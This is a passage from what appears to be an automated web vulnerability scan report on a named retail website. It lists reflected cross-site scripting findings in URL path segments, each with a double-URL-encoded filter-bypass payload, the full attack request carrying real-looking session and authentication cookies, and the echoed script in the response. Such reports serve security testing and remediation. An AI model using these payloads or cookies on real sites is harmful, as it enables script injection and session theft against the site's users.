Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:58 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc4bf8d";alert(1)//fb934201d4c/medialib/labware/labware-icons/glassware","E404") ;
   </script>
...[SNIP]...

1.374. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/glassware [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/glassware

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90ea3%2522%253balert%25281%2529%252f%252f3f083b9afc7 was submitted in the REST URL parameter 2. This input was echoed as 90ea3";alert(1)//3f083b9afc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib90ea3%2522%253balert%25281%2529%252f%252f3f083b9afc7/labware/labware-icons/glassware HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib90ea3";alert(1)//3f083b9afc7/labware/labware-icons/glassware","E404") ;
   </script>
...[SNIP]...

1.375. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/glassware [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/glassware

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 904d5%2522%253balert%25281%2529%252f%252fabe7f69f5da was submitted in the REST URL parameter 3. This input was echoed as 904d5";alert(1)//abe7f69f5da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware904d5%2522%253balert%25281%2529%252f%252fabe7f69f5da/labware-icons/glassware HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware904d5";alert(1)//abe7f69f5da/labware-icons/glassware","E404") ;
   </script>
...[SNIP]...

1.376. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/glassware [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/glassware

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d39%2522%253balert%25281%2529%252f%252f7f43bf32a17 was submitted in the REST URL parameter 4. This input was echoed as b7d39";alert(1)//7f43bf32a17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsb7d39%2522%253balert%25281%2529%252f%252f7f43bf32a17/glassware HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsb7d39";alert(1)//7f43bf32a17/glassware","E404") ;
   </script>
...[SNIP]...

1.377. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/glassware [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/glassware

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 667bd%2522%253balert%25281%2529%252f%252f07f36d0da76 was submitted in the REST URL parameter 5. This input was echoed as 667bd";alert(1)//07f36d0da76 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/glassware667bd%2522%253balert%25281%2529%252f%252f07f36d0da76 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/glassware667bd";alert(1)//07f36d0da76","E404") ;
   </script>
...[SNIP]...

1.378. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/multiwell-plates [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/multiwell-plates

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfc7b%2522%253balert%25281%2529%252f%252ff1d6d11a0ec was submitted in the REST URL parameter 1. This input was echoed as dfc7b";alert(1)//f1d6d11a0ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcdfc7b%2522%253balert%25281%2529%252f%252ff1d6d11a0ec/medialib/labware/labware-icons/multiwell-plates HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
